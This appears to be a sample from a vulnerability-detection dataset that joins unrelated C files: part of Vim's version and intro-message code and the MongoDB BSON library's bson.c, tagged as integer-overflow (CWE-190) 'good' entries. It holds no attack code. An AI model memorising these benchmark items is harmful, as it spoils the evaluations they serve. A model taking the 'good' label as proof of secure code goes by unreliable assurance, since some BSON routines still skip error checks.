# ifdef USR_GVIMRC_FILE2
version_msg(_("2nd user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE2);
version_msg("\"\n");
# endif
# ifdef USR_GVIMRC_FILE3
version_msg(_("3rd user gvimrc file: \""));
version_msg(USR_GVIMRC_FILE3);
version_msg("\"\n");
# endif
#endif
version_msg(_(" defaults file: \""));
version_msg(VIM_DEFAULTS_FILE);
version_msg("\"\n");
#ifdef FEAT_GUI
# ifdef SYS_MENU_FILE
version_msg(_(" system menu file: \""));
version_msg(SYS_MENU_FILE);
version_msg("\"\n");
# endif
#endif
#ifdef HAVE_PATHDEF
if (*default_vim_dir != NUL)
{
version_msg(_(" fall-back for $VIM: \""));
version_msg((char *)default_vim_dir);
version_msg("\"\n");
}
if (*default_vimruntime_dir != NUL)
{
version_msg(_(" f-b for $VIMRUNTIME: \""));
version_msg((char *)default_vimruntime_dir);
version_msg("\"\n");
}
version_msg(_("Compilation: "));
version_msg((char *)all_cflags);
version_msg("\n");
#ifdef VMS
if (*compiler_version != NUL)
{
version_msg(_("Compiler: "));
version_msg((char *)compiler_version);
version_msg("\n");
}
#endif
version_msg(_("Linking: "));
version_msg((char *)all_lflags);
#endif
#ifdef DEBUG
version_msg("\n");
version_msg(_(" DEBUG BUILD"));
#endif
}
/*
* Output a string for the version message. If it's going to wrap, output a
* newline, unless the message is too long to fit on the screen anyway.
*/
static void
version_msg(char *s)
{
int len = (int)STRLEN(s);
if (!got_int && len < (int)Columns && msg_col + len >= (int)Columns
&& *s != '\n')
msg_putchar('\n');
if (!got_int)
MSG_PUTS(s);
}
static void do_intro_line(int row, char_u *mesg, int add_version, int attr);
/*
* Show the intro message when not editing a file.
*/
void
maybe_intro_message(void)
{
if (bufempty()
&& curbuf->b_fname == NULL
#ifdef FEAT_WINDOWS
&& firstwin->w_next == NULL
#endif
&& vim_strchr(p_shm, SHM_INTRO) == NULL)
intro_message(FALSE);
}
/*
* Give an introductory message about Vim.
* Only used when starting Vim on an empty file, without a file name.
* Or with the ":intro" command (for Sven :-).
*/
void
intro_message(
int colon) /* TRUE for ":intro" */
{
int i;
int row;
int blanklines;
int sponsor;
char *p;
static char *(lines[]) =
{
N_("VIM - Vi IMproved"),
"",
N_("version "),
N_("by Bram Moolenaar et al."),
#ifdef MODIFIED_BY
" ",
#endif
N_("Vim is open source and freely distributable"),
"",
N_("Help poor children in Uganda!"),
N_("type :help iccf<Enter> for information "),
"",
N_("type :q<Enter> to exit "),
N_("type :help<Enter> or <F1> for on-line help"),
N_("type :help version8<Enter> for version info"),
NULL,
"",
N_("Running in Vi compatible mode"),
N_("type :set nocp<Enter> for Vim defaults"),
N_("type :help cp-default<Enter> for info on this"),
};
#ifdef FEAT_GUI
static char *(gui_lines[]) =
{
NULL,
NULL,
NULL,
NULL,
#ifdef MODIFIED_BY
NULL,
#endif
NULL,
NULL,
NULL,
N_("menu Help->Orphans for information "),
NULL,
N_("Running modeless, typed text is inserted"),
N_("menu Edit->Global Settings->Toggle Insert Mode "),
N_(" for two modes "),
NULL,
NULL,
NULL,
N_("menu Edit->Global Settings->Toggle Vi Compatible"),
N_(" for Vim defaults "),
};
#endif
/* blanklines = screen height - # message lines */
blanklines = (int)Rows - ((sizeof(lines) / sizeof(char *)) - 1);
if (!p_cp)
blanklines += 4; /* add 4 for not showing "Vi compatible" message */
#ifdef FEAT_WINDOWS
/* Don't overwrite a statusline. Depends on 'cmdheight'. */
if (p_ls > 1)
blanklines -= Rows - topframe->fr_height;
#endif
if (blanklines < 0)
blanklines = 0;
/* Show the sponsor and register message one out of four times, the Uganda
* message two out of four times. */
sponsor = (int)time(NULL);
sponsor = ((sponsor & 2) == 0) - ((sponsor & 4) == 0);
/* start displaying the message lines after half of the blank lines */
row = blanklines / 2;
if ((row >= 2 && Columns >= 50) || colon)
{
for (i = 0; i < (int)(sizeof(lines) / sizeof(char *)); ++i)
{
p = lines[i];
#ifdef FEAT_GUI
if (p_im && gui.in_use && gui_lines[i] != NULL)
p = gui_lines[i];
#endif
if (p == NULL)
{
if (!p_cp)
break;
continue;
}
if (sponsor != 0)
{
if (strstr(p, "children") != NULL)
p = sponsor < 0
? N_("Sponsor Vim development!")
: N_("Become a registered Vim user!");
else if (strstr(p, "iccf") != NULL)
p = sponsor < 0
? N_("type :help sponsor<Enter> for information ")
: N_("type :help register<Enter> for information ");
else if (strstr(p, "Orphans") != NULL)
p = N_("menu Help->Sponsor/Register for information ");
}
if (*p != NUL)
do_intro_line(row, (char_u *)_(p), i == 2, 0);
++row;
}
}
/* Make the wait-return message appear just below the text. */
if (colon)
msg_row = row;
}
static void
do_intro_line(
int row,
char_u *mesg,
int add_version,
int attr)
{
char_u vers[20];
int col;
char_u *p;
int l;
int clen;
#ifdef MODIFIED_BY
# define MODBY_LEN 150
char_u modby[MODBY_LEN];
if (*mesg == ' ')
{
vim_strncpy(modby, (char_u *)_("Modified by "), MODBY_LEN - 1);
l = (int)STRLEN(modby);
vim_strncpy(modby + l, (char_u *)MODIFIED_BY, MODBY_LEN - l - 1);
mesg = modby;
}
#endif
/* Center the message horizontally. */
col = vim_strsize(mesg);
if (add_version)
{
STRCPY(vers, mediumVersion);
if (highest_patch())
{
/* Check for 9.9x or 9.9xx, alpha/beta version */
if (isalpha((int)vers[3]))
{
int len = (isalpha((int)vers[4])) ? 5 : 4;
sprintf((char *)vers + len, ".%d%s", highest_patch(),
mediumVersion + len);
}
else
sprintf((char *)vers + 3, ".%d", highest_patch());
}
col += (int)STRLEN(vers);
}
col = (Columns - col) / 2;
if (col < 0)
col = 0;
/* Split up in parts to highlight <> items differently. */
for (p = mesg; *p != NUL; p += l)
{
clen = 0;
for (l = 0; p[l] != NUL
&& (l == 0 || (p[l] != '<' && p[l - 1] != '>')); ++l)
{
#ifdef FEAT_MBYTE
if (has_mbyte)
{
clen += ptr2cells(p + l);
l += (*mb_ptr2len)(p + l) - 1;
}
else
#endif
clen += byte2cells(p[l]);
}
screen_puts_len(p, l, row, col, *p == '<' ? hl_attr(HLF_8) : attr);
col += clen;
}
/* Add the version number to the version line. */
if (add_version)
screen_puts(vers, row, col, 0);
}
/*
* ":intro": clear screen, display intro screen and wait for return.
*/
void
ex_intro(exarg_T *eap UNUSED)
{
screenclear();
intro_message(TRUE);
wait_return(TRUE);
}
| ./CrossVul/dataset_final_sorted/CWE-190/c/good_3179_1 |
crossvul-cpp_data_good_3983_1 | /* bson.c */
/* Copyright 2009, 2010 10gen Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdlib.h>
#include <string.h>
#include <stdio.h>
#include <time.h>
#include <limits.h>
#include "bson.h"
#include "encoding.h"
const int initialBufferSize = 128;
/* only need one of these */
static const int zero = 0;
/* Custom standard function pointers. */
void *( *bson_malloc_func )( size_t ) = malloc;
void *( *bson_realloc_func )( void *, size_t ) = realloc;
void ( *bson_free_func )( void * ) = free;
#ifdef R_SAFETY_NET
bson_printf_func bson_printf;
#else
bson_printf_func bson_printf = printf;
#endif
bson_fprintf_func bson_fprintf = fprintf;
bson_sprintf_func bson_sprintf = sprintf;
static int _bson_errprintf( const char *, ... );
bson_printf_func bson_errprintf = _bson_errprintf;
/* ObjectId fuzz functions. */
static int ( *oid_fuzz_func )( void ) = NULL;
static int ( *oid_inc_func )( void ) = NULL;
/* ----------------------------
READING
------------------------------ */
MONGO_EXPORT bson* bson_create( void ) {
return (bson*)bson_malloc(sizeof(bson));
}
MONGO_EXPORT void bson_dispose(bson* b) {
bson_free(b);
}
MONGO_EXPORT bson *bson_empty( bson *obj ) {
static char *data = "\005\0\0\0\0";
bson_init_data( obj, data );
obj->finished = 1;
obj->err = 0;
obj->errstr = NULL;
obj->stackPos = 0;
return obj;
}
MONGO_EXPORT int bson_copy( bson *out, const bson *in ) {
if ( !out || !in ) return BSON_ERROR;
if ( !in->finished ) return BSON_ERROR;
bson_init_size( out, bson_size( in ) );
memcpy( out->data, in->data, bson_size( in ) );
out->finished = 1;
return BSON_OK;
}
int bson_init_data( bson *b, char *data ) {
b->data = data;
return BSON_OK;
}
int bson_init_finished_data( bson *b, char *data ) {
bson_init_data( b, data );
b->finished = 1;
return BSON_OK;
}
static void _bson_reset( bson *b ) {
b->finished = 0;
b->stackPos = 0;
b->err = 0;
b->errstr = NULL;
}
MONGO_EXPORT int bson_size( const bson *b ) {
int i;
if ( ! b || ! b->data )
return 0;
bson_little_endian32( &i, b->data );
return i;
}
MONGO_EXPORT size_t bson_buffer_size( const bson *b ) {
return (b->cur - b->data + 1);
}
MONGO_EXPORT const char *bson_data( const bson *b ) {
return (const char *)b->data;
}
static char hexbyte( char hex ) {
if (hex >= '0' && hex <= '9')
return (hex - '0');
else if (hex >= 'A' && hex <= 'F')
return (hex - 'A' + 10);
else if (hex >= 'a' && hex <= 'f')
return (hex - 'a' + 10);
else
return 0x0;
}
MONGO_EXPORT void bson_oid_from_string( bson_oid_t *oid, const char *str ) {
int i;
for ( i=0; i<12; i++ ) {
oid->bytes[i] = ( hexbyte( str[2*i] ) << 4 ) | hexbyte( str[2*i + 1] );
}
}
MONGO_EXPORT void bson_oid_to_string( const bson_oid_t *oid, char *str ) {
static const char hex[16] = {'0','1','2','3','4','5','6','7','8','9','a','b','c','d','e','f'};
int i;
for ( i=0; i<12; i++ ) {
str[2*i] = hex[( oid->bytes[i] & 0xf0 ) >> 4];
str[2*i + 1] = hex[ oid->bytes[i] & 0x0f ];
}
str[24] = '\0';
}
MONGO_EXPORT void bson_set_oid_fuzz( int ( *func )( void ) ) {
oid_fuzz_func = func;
}
MONGO_EXPORT void bson_set_oid_inc( int ( *func )( void ) ) {
oid_inc_func = func;
}
MONGO_EXPORT void bson_oid_gen( bson_oid_t *oid ) {
static int incr = 0;
static int fuzz = 0;
int i;
time_t t = time( NULL );
if( oid_inc_func )
i = oid_inc_func();
else
i = incr++;
if ( !fuzz ) {
if ( oid_fuzz_func )
fuzz = oid_fuzz_func();
else {
srand( ( int )t );
fuzz = rand();
}
}
bson_big_endian32( &oid->ints[0], &t );
oid->ints[1] = fuzz;
bson_big_endian32( &oid->ints[2], &i );
}
MONGO_EXPORT time_t bson_oid_generated_time( bson_oid_t *oid ) {
time_t out;
bson_big_endian32( &out, &oid->ints[0] );
return out;
}
MONGO_EXPORT void bson_print( const bson *b ) {
bson_print_raw( b->data , 0 );
}
MONGO_EXPORT void bson_print_raw( const char *data , int depth ) {
bson_iterator i;
const char *key;
int temp;
bson_timestamp_t ts;
char oidhex[25];
bson scope;
bson_iterator_from_buffer( &i, data );
while ( bson_iterator_next( &i ) ) {
bson_type t = bson_iterator_type( &i );
if ( t == 0 )
break;
key = bson_iterator_key( &i );
for ( temp=0; temp<=depth; temp++ )
bson_printf( "\t" );
bson_printf( "%s : %d \t " , key , t );
switch ( t ) {
case BSON_DOUBLE:
bson_printf( "%f" , bson_iterator_double( &i ) );
break;
case BSON_STRING:
bson_printf( "%s" , bson_iterator_string( &i ) );
break;
case BSON_SYMBOL:
bson_printf( "SYMBOL: %s" , bson_iterator_string( &i ) );
break;
case BSON_OID:
bson_oid_to_string( bson_iterator_oid( &i ), oidhex );
bson_printf( "%s" , oidhex );
break;
case BSON_BOOL:
bson_printf( "%s" , bson_iterator_bool( &i ) ? "true" : "false" );
break;
case BSON_DATE:
bson_printf( "%ld" , ( long int )bson_iterator_date( &i ) );
break;
case BSON_BINDATA:
bson_printf( "BSON_BINDATA" );
break;
case BSON_UNDEFINED:
bson_printf( "BSON_UNDEFINED" );
break;
case BSON_NULL:
bson_printf( "BSON_NULL" );
break;
case BSON_REGEX:
bson_printf( "BSON_REGEX: %s", bson_iterator_regex( &i ) );
break;
case BSON_CODE:
bson_printf( "BSON_CODE: %s", bson_iterator_code( &i ) );
break;
case BSON_CODEWSCOPE:
bson_printf( "BSON_CODE_W_SCOPE: %s", bson_iterator_code( &i ) );
/* bson_init( &scope ); */ /* review - stepped on by bson_iterator_code_scope? */
bson_iterator_code_scope( &i, &scope );
bson_printf( "\n\t SCOPE: " );
bson_print( &scope );
/* bson_destroy( &scope ); */ /* review - causes free error */
break;
case BSON_INT:
bson_printf( "%d" , bson_iterator_int( &i ) );
break;
case BSON_LONG:
bson_printf( "%lld" , ( uint64_t )bson_iterator_long( &i ) );
break;
case BSON_TIMESTAMP:
ts = bson_iterator_timestamp( &i );
bson_printf( "i: %d, t: %d", ts.i, ts.t );
break;
case BSON_OBJECT:
case BSON_ARRAY:
bson_printf( "\n" );
bson_print_raw( bson_iterator_value( &i ) , depth + 1 );
break;
default:
bson_errprintf( "can't print type : %d\n" , t );
}
bson_printf( "\n" );
}
}
/* ----------------------------
ITERATOR
------------------------------ */
MONGO_EXPORT bson_iterator* bson_iterator_create( void ) {
return ( bson_iterator* )malloc( sizeof( bson_iterator ) );
}
MONGO_EXPORT void bson_iterator_dispose(bson_iterator* i) {
free(i);
}
MONGO_EXPORT void bson_iterator_init( bson_iterator *i, const bson *b ) {
i->cur = b->data + 4;
i->first = 1;
}
MONGO_EXPORT void bson_iterator_from_buffer( bson_iterator *i, const char *buffer ) {
i->cur = buffer + 4;
i->first = 1;
}
MONGO_EXPORT bson_type bson_find( bson_iterator *it, const bson *obj, const char *name ) {
bson_iterator_init( it, (bson *)obj );
while( bson_iterator_next( it ) ) {
if ( strcmp( name, bson_iterator_key( it ) ) == 0 )
break;
}
return bson_iterator_type( it );
}
MONGO_EXPORT bson_bool_t bson_iterator_more( const bson_iterator *i ) {
return *( i->cur );
}
MONGO_EXPORT bson_type bson_iterator_next( bson_iterator *i ) {
size_t ds;
if ( i->first ) {
i->first = 0;
return ( bson_type )( *i->cur );
}
switch ( bson_iterator_type( i ) ) {
case BSON_EOO:
return BSON_EOO; /* don't advance */
case BSON_UNDEFINED:
case BSON_NULL:
ds = 0;
break;
case BSON_BOOL:
ds = 1;
break;
case BSON_INT:
ds = 4;
break;
case BSON_LONG:
case BSON_DOUBLE:
case BSON_TIMESTAMP:
case BSON_DATE:
ds = 8;
break;
case BSON_OID:
ds = 12;
break;
case BSON_STRING:
case BSON_SYMBOL:
case BSON_CODE:
ds = 4 + bson_iterator_int_raw( i );
break;
case BSON_BINDATA:
ds = 5 + bson_iterator_int_raw( i );
break;
case BSON_OBJECT:
case BSON_ARRAY:
case BSON_CODEWSCOPE:
ds = bson_iterator_int_raw( i );
break;
case BSON_DBREF:
ds = 4+12 + bson_iterator_int_raw( i );
break;
case BSON_REGEX: {
const char *s = bson_iterator_value( i );
const char *p = s;
p += strlen( p )+1;
p += strlen( p )+1;
ds = p-s;
break;
}
default: {
char msg[] = "unknown type: 000000000000";
bson_numstr( msg+14, ( unsigned )( i->cur[0] ) );
bson_fatal_msg( 0, msg );
return 0;
}
}
i->cur += 1 + strlen( i->cur + 1 ) + 1 + ds;
return ( bson_type )( *i->cur );
}
MONGO_EXPORT bson_type bson_iterator_type( const bson_iterator *i ) {
return ( bson_type )i->cur[0];
}
MONGO_EXPORT const char *bson_iterator_key( const bson_iterator *i ) {
return i->cur + 1;
}
MONGO_EXPORT const char *bson_iterator_value( const bson_iterator *i ) {
const char *t = i->cur + 1;
t += strlen( t ) + 1;
return t;
}
/* types */
int bson_iterator_int_raw( const bson_iterator *i ) {
int out;
bson_little_endian32( &out, bson_iterator_value( i ) );
return out;
}
double bson_iterator_double_raw( const bson_iterator *i ) {
double out;
bson_little_endian64( &out, bson_iterator_value( i ) );
return out;
}
int64_t bson_iterator_long_raw( const bson_iterator *i ) {
int64_t out;
bson_little_endian64( &out, bson_iterator_value( i ) );
return out;
}
bson_bool_t bson_iterator_bool_raw( const bson_iterator *i ) {
return bson_iterator_value( i )[0];
}
MONGO_EXPORT bson_oid_t *bson_iterator_oid( const bson_iterator *i ) {
return ( bson_oid_t * )bson_iterator_value( i );
}
MONGO_EXPORT int bson_iterator_int( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return ( int )bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT double bson_iterator_double( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT int64_t bson_iterator_long( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_INT:
return bson_iterator_int_raw( i );
case BSON_LONG:
return bson_iterator_long_raw( i );
case BSON_DOUBLE:
return bson_iterator_double_raw( i );
default:
return 0;
}
}
MONGO_EXPORT bson_timestamp_t bson_iterator_timestamp( const bson_iterator *i ) {
bson_timestamp_t ts;
bson_little_endian32( &( ts.i ), bson_iterator_value( i ) );
bson_little_endian32( &( ts.t ), bson_iterator_value( i ) + 4 );
return ts;
}
MONGO_EXPORT int bson_iterator_timestamp_time( const bson_iterator *i ) {
int time;
bson_little_endian32( &time, bson_iterator_value( i ) + 4 );
return time;
}
MONGO_EXPORT int bson_iterator_timestamp_increment( const bson_iterator *i ) {
int increment;
bson_little_endian32( &increment, bson_iterator_value( i ) );
return increment;
}
MONGO_EXPORT bson_bool_t bson_iterator_bool( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_BOOL:
return bson_iterator_bool_raw( i );
case BSON_INT:
return bson_iterator_int_raw( i ) != 0;
case BSON_LONG:
return bson_iterator_long_raw( i ) != 0;
case BSON_DOUBLE:
return bson_iterator_double_raw( i ) != 0;
case BSON_EOO:
case BSON_NULL:
return 0;
default:
return 1;
}
}
MONGO_EXPORT const char *bson_iterator_string( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_STRING:
case BSON_SYMBOL:
return bson_iterator_value( i ) + 4;
default:
return "";
}
}
int bson_iterator_string_len( const bson_iterator *i ) {
return bson_iterator_int_raw( i );
}
MONGO_EXPORT const char *bson_iterator_code( const bson_iterator *i ) {
switch ( bson_iterator_type( i ) ) {
case BSON_STRING:
case BSON_CODE:
return bson_iterator_value( i ) + 4;
case BSON_CODEWSCOPE:
return bson_iterator_value( i ) + 8;
default:
return NULL;
}
}
MONGO_EXPORT void bson_iterator_code_scope( const bson_iterator *i, bson *scope ) {
if ( bson_iterator_type( i ) == BSON_CODEWSCOPE ) {
int code_len;
bson_little_endian32( &code_len, bson_iterator_value( i )+4 );
bson_init_data( scope, ( void * )( bson_iterator_value( i )+8+code_len ) );
_bson_reset( scope );
scope->finished = 1;
}
else {
bson_empty( scope );
}
}
MONGO_EXPORT bson_date_t bson_iterator_date( const bson_iterator *i ) {
return bson_iterator_long_raw( i );
}
MONGO_EXPORT time_t bson_iterator_time_t( const bson_iterator *i ) {
return bson_iterator_date( i ) / 1000;
}
MONGO_EXPORT int bson_iterator_bin_len( const bson_iterator *i ) {
return ( bson_iterator_bin_type( i ) == BSON_BIN_BINARY_OLD )
? bson_iterator_int_raw( i ) - 4
: bson_iterator_int_raw( i );
}
MONGO_EXPORT char bson_iterator_bin_type( const bson_iterator *i ) {
return bson_iterator_value( i )[4];
}
MONGO_EXPORT const char *bson_iterator_bin_data( const bson_iterator *i ) {
return ( bson_iterator_bin_type( i ) == BSON_BIN_BINARY_OLD )
? bson_iterator_value( i ) + 9
: bson_iterator_value( i ) + 5;
}
MONGO_EXPORT const char *bson_iterator_regex( const bson_iterator *i ) {
return bson_iterator_value( i );
}
MONGO_EXPORT const char *bson_iterator_regex_opts( const bson_iterator *i ) {
const char *p = bson_iterator_value( i );
return p + strlen( p ) + 1;
}
MONGO_EXPORT void bson_iterator_subobject( const bson_iterator *i, bson *sub ) {
bson_init_data( sub, ( char * )bson_iterator_value( i ) );
_bson_reset( sub );
sub->finished = 1;
}
MONGO_EXPORT void bson_iterator_subiterator( const bson_iterator *i, bson_iterator *sub ) {
bson_iterator_from_buffer( sub, bson_iterator_value( i ) );
}
/* ----------------------------
BUILDING
------------------------------ */
static void _bson_init_size( bson *b, int size ) {
if( size == 0 )
b->data = NULL;
else
b->data = ( char * )bson_malloc( size );
b->dataSize = size;
b->cur = b->data + 4;
_bson_reset( b );
}
MONGO_EXPORT void bson_init( bson *b ) {
_bson_init_size( b, initialBufferSize );
}
void bson_init_size( bson *b, int size ) {
_bson_init_size( b, size );
}
static void bson_append_byte( bson *b, char c ) {
b->cur[0] = c;
b->cur++;
}
static void bson_append( bson *b, const void *data, size_t len ) {
memcpy( b->cur , data , len );
b->cur += len;
}
static void bson_append32( bson *b, const void *data ) {
bson_little_endian32( b->cur, data );
b->cur += 4;
}
static void bson_append32_as_int( bson *b, int data ) {
bson_little_endian32( b->cur, &data );
b->cur += 4;
}
static void bson_append64( bson *b, const void *data ) {
bson_little_endian64( b->cur, data );
b->cur += 8;
}
int bson_ensure_space( bson *b, const size_t bytesNeeded ) {
int pos = b->cur - b->data;
char *orig = b->data;
int new_size;
if ( pos + bytesNeeded <= b->dataSize )
return BSON_OK;
new_size = 1.5 * ( b->dataSize + bytesNeeded );
if( new_size < b->dataSize ) {
if( ( b->dataSize + bytesNeeded ) < INT_MAX )
new_size = INT_MAX;
else {
b->err = BSON_SIZE_OVERFLOW;
return BSON_ERROR;
}
}
b->data = bson_realloc( b->data, new_size );
if ( !b->data )
bson_fatal_msg( !!b->data, "realloc() failed" );
b->dataSize = new_size;
b->cur += b->data - orig;
return BSON_OK;
}
MONGO_EXPORT int bson_finish( bson *b ) {
int i;
if( b->err & BSON_NOT_UTF8 )
return BSON_ERROR;
if ( ! b->finished ) {
if ( bson_ensure_space( b, 1 ) == BSON_ERROR ) return BSON_ERROR;
bson_append_byte( b, 0 );
i = ( int )( b->cur - b->data );
bson_little_endian32( b->data, &i );
b->finished = 1;
}
return BSON_OK;
}
MONGO_EXPORT void bson_destroy( bson *b ) {
if (b) {
bson_free( b->data );
b->err = 0;
b->data = 0;
b->cur = 0;
b->finished = 1;
}
}
static int bson_append_estart( bson *b, int type, const char *name, const size_t dataSize ) {
const int len = strlen( name ) + 1;
if ( b->finished ) {
b->err |= BSON_ALREADY_FINISHED;
return BSON_ERROR;
}
if ( bson_ensure_space( b, 1 + len + dataSize ) == BSON_ERROR ) {
return BSON_ERROR;
}
if( bson_check_field_name( b, ( const char * )name, len - 1 ) == BSON_ERROR ) {
bson_builder_error( b );
return BSON_ERROR;
}
bson_append_byte( b, ( char )type );
bson_append( b, name, len );
return BSON_OK;
}
/* ----------------------------
BUILDING TYPES
------------------------------ */
MONGO_EXPORT int bson_append_int( bson *b, const char *name, const int i ) {
if ( bson_append_estart( b, BSON_INT, name, 4 ) == BSON_ERROR )
return BSON_ERROR;
bson_append32( b , &i );
return BSON_OK;
}
MONGO_EXPORT int bson_append_long( bson *b, const char *name, const int64_t i ) {
if ( bson_append_estart( b , BSON_LONG, name, 8 ) == BSON_ERROR )
return BSON_ERROR;
bson_append64( b , &i );
return BSON_OK;
}
MONGO_EXPORT int bson_append_double( bson *b, const char *name, const double d ) {
if ( bson_append_estart( b, BSON_DOUBLE, name, 8 ) == BSON_ERROR )
return BSON_ERROR;
bson_append64( b , &d );
return BSON_OK;
}
MONGO_EXPORT int bson_append_bool( bson *b, const char *name, const bson_bool_t i ) {
if ( bson_append_estart( b, BSON_BOOL, name, 1 ) == BSON_ERROR )
return BSON_ERROR;
bson_append_byte( b , i != 0 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_null( bson *b, const char *name ) {
if ( bson_append_estart( b , BSON_NULL, name, 0 ) == BSON_ERROR )
return BSON_ERROR;
return BSON_OK;
}
MONGO_EXPORT int bson_append_undefined( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_UNDEFINED, name, 0 ) == BSON_ERROR )
return BSON_ERROR;
return BSON_OK;
}
static int bson_append_string_base( bson *b, const char *name,
const char *value, size_t len, bson_type type ) {
size_t sl = len + 1;
if ( bson_check_string( b, ( const char * )value, sl - 1 ) == BSON_ERROR )
return BSON_ERROR;
if ( bson_append_estart( b, type, name, 4 + sl ) == BSON_ERROR ) {
return BSON_ERROR;
}
bson_append32_as_int( b , ( int )sl );
bson_append( b , value , sl - 1 );
bson_append( b , "\0" , 1 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_string( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_STRING );
}
MONGO_EXPORT int bson_append_symbol( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_SYMBOL );
}
MONGO_EXPORT int bson_append_code( bson *b, const char *name, const char *value ) {
return bson_append_string_base( b, name, value, strlen ( value ), BSON_CODE );
}
MONGO_EXPORT int bson_append_string_n( bson *b, const char *name, const char *value, size_t len ) {
return bson_append_string_base( b, name, value, len, BSON_STRING );
}
MONGO_EXPORT int bson_append_symbol_n( bson *b, const char *name, const char *value, size_t len ) {
return bson_append_string_base( b, name, value, len, BSON_SYMBOL );
}
MONGO_EXPORT int bson_append_code_n( bson *b, const char *name, const char *value, size_t len ) {
return bson_append_string_base( b, name, value, len, BSON_CODE );
}
MONGO_EXPORT int bson_append_code_w_scope_n( bson *b, const char *name,
const char *code, size_t len, const bson *scope ) {
size_t sl, size;
if ( !scope ) return BSON_ERROR;
sl = len + 1;
size = 4 + 4 + sl + bson_size( scope );
if ( bson_append_estart( b, BSON_CODEWSCOPE, name, size ) == BSON_ERROR )
return BSON_ERROR;
bson_append32_as_int( b, ( int )size );
bson_append32( b, &sl );
bson_append( b, code, sl );
bson_append( b, scope->data, bson_size( scope ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_code_w_scope( bson *b, const char *name, const char *code, const bson *scope ) {
return bson_append_code_w_scope_n( b, name, code, strlen ( code ), scope );
}
MONGO_EXPORT int bson_append_binary( bson *b, const char *name, char type, const char *str, size_t len ) {
if ( type == BSON_BIN_BINARY_OLD ) {
int subtwolen = len + 4;
if ( bson_append_estart( b, BSON_BINDATA, name, 4+1+4+len ) == BSON_ERROR )
return BSON_ERROR;
bson_append32_as_int( b, ( int )subtwolen );
bson_append_byte( b, type );
bson_append32_as_int( b, ( int )len );
bson_append( b, str, len );
}
else {
if ( bson_append_estart( b, BSON_BINDATA, name, 4+1+len ) == BSON_ERROR )
return BSON_ERROR;
bson_append32_as_int( b, ( int )len );
bson_append_byte( b, type );
bson_append( b, str, len );
}
return BSON_OK;
}
MONGO_EXPORT int bson_append_oid( bson *b, const char *name, const bson_oid_t *oid ) {
if ( bson_append_estart( b, BSON_OID, name, 12 ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , oid , 12 );
return BSON_OK;
}
MONGO_EXPORT int bson_append_new_oid( bson *b, const char *name ) {
bson_oid_t oid;
bson_oid_gen( &oid );
return bson_append_oid( b, name, &oid );
}
MONGO_EXPORT int bson_append_regex( bson *b, const char *name, const char *pattern, const char *opts ) {
const size_t plen = strlen( pattern )+1;
const size_t olen = strlen( opts )+1;
if ( bson_append_estart( b, BSON_REGEX, name, plen + olen ) == BSON_ERROR )
return BSON_ERROR;
if ( bson_check_string( b, pattern, plen - 1 ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , pattern , plen );
bson_append( b , opts , olen );
return BSON_OK;
}
MONGO_EXPORT int bson_append_bson( bson *b, const char *name, const bson *bson ) {
if ( !bson ) return BSON_ERROR;
if ( bson_append_estart( b, BSON_OBJECT, name, bson_size( bson ) ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b , bson->data , bson_size( bson ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_element( bson *b, const char *name_or_null, const bson_iterator *elem ) {
bson_iterator next = *elem;
size_t size;
bson_iterator_next( &next );
size = next.cur - elem->cur;
if ( name_or_null == NULL ) {
if( bson_ensure_space( b, size ) == BSON_ERROR )
return BSON_ERROR;
bson_append( b, elem->cur, size );
}
else {
size_t data_size = size - 2 - strlen( bson_iterator_key( elem ) );
bson_append_estart( b, elem->cur[0], name_or_null, data_size );
bson_append( b, bson_iterator_value( elem ), data_size );
}
return BSON_OK;
}
MONGO_EXPORT int bson_append_timestamp( bson *b, const char *name, bson_timestamp_t *ts ) {
if ( bson_append_estart( b, BSON_TIMESTAMP, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append32( b , &( ts->i ) );
bson_append32( b , &( ts->t ) );
return BSON_OK;
}
MONGO_EXPORT int bson_append_timestamp2( bson *b, const char *name, int time, int increment ) {
if ( bson_append_estart( b, BSON_TIMESTAMP, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append32( b , &increment );
bson_append32( b , &time );
return BSON_OK;
}
MONGO_EXPORT int bson_append_date( bson *b, const char *name, bson_date_t millis ) {
if ( bson_append_estart( b, BSON_DATE, name, 8 ) == BSON_ERROR ) return BSON_ERROR;
bson_append64( b , &millis );
return BSON_OK;
}
MONGO_EXPORT int bson_append_time_t( bson *b, const char *name, time_t secs ) {
return bson_append_date( b, name, ( bson_date_t )secs * 1000 );
}
MONGO_EXPORT int bson_append_start_object( bson *b, const char *name ) {
if ( bson_append_estart( b, BSON_OBJECT, name, 5 ) == BSON_ERROR ) return BSON_ERROR;
b->stack[ b->stackPos++ ] = b->cur - b->data;
bson_append32( b , &zero );
return BSON_OK;
}
MONGO_EXPORT int bson_append_start_array( bson *b, const char *name ) {
